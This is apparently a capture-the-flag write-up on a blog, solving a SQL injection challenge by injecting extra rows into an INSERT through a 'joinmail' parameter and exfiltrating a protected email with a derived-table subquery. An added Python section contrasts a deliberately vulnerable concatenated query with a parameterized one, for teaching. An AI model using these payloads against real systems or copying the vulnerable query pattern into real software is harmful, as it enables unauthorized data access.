![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-64.png?w=1024)
In this lab, we need to find the value of `email` with `no=1`, so we will duplicate it with an INSERT statement.
We can insert multiple rows at once. To test this, we use the payload:
?joinmail=a'),+(2,'14.248.83.2','aa')#
![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-67.png?w=711)
It worked. Next, we just need to replace the `'aa'` value with the email. However, MySQL does not allow an INSERT to select directly from the table it is inserting into, so we change the payload a little and wrap the subquery in a derived table (`as a`):
?joinmail=b'),+(3,'14.248.83.2',(select+email+from+(select+email+from+prob_phantom+where+no=1)+as+a))#
![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-68.png?w=1024)
Then, we find the email with `no=1`.
admin_secure_email@rubiya.kr
![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-66.png?w=253)
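Why the payload works, and what stops it, shown as an added example that is not part of the original write-up or the challenge's own code: the same INSERT built by string concatenation and then with bound parameters. Assumptions: the `members` table, its columns, the function names and the sample values are hypothetical; SQLite stands in for MySQL, so the comment marker is `--` instead of `#` and the derived-table wrapper is not needed.

```python
import sqlite3

SECRET = "secret@example.test"   # constructed stand-in for the no=1 email
IP = "203.0.113.5"               # constructed client address (documentation range)

# Constructed input with the same shape as the payload above:
# close the first row, append a second row whose email is a subquery.
PAYLOAD = f"b'), (3, '{IP}', (SELECT email FROM members WHERE no = 1)) --"


def make_db():
    """In-memory table with one protected row (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (no INTEGER, ip TEXT, email TEXT)")
    db.execute("INSERT INTO members VALUES (1, '', ?)", (SECRET,))
    return db


def join_vulnerable(db, ip, joinmail):
    # Weak: input is pasted into the VALUES list, so a quote and a
    # parenthesis let it add rows and subqueries of its own.
    db.execute(f"INSERT INTO members VALUES (0, '{ip}', '{joinmail}')")


def join_safe(db, ip, joinmail):
    # Hardened: bound parameters are always stored as one string value.
    db.execute("INSERT INTO members VALUES (0, ?, ?)", (ip, joinmail))


def visible_rows(db, ip):
    # Assumption: the application only shows a client the rows for its own IP.
    cur = db.execute(
        "SELECT no, email FROM members WHERE ip = ? ORDER BY no", (ip,)
    )
    return cur.fetchall()


if __name__ == "__main__":
    for join in (join_vulnerable, join_safe):
        db = make_db()
        join(db, IP, PAYLOAD)
        print(join.__name__, visible_rows(db, IP))
```

With the concatenated query the protected email is copied into a row the client can read; with bound parameters the whole input is stored as the email text of a single row.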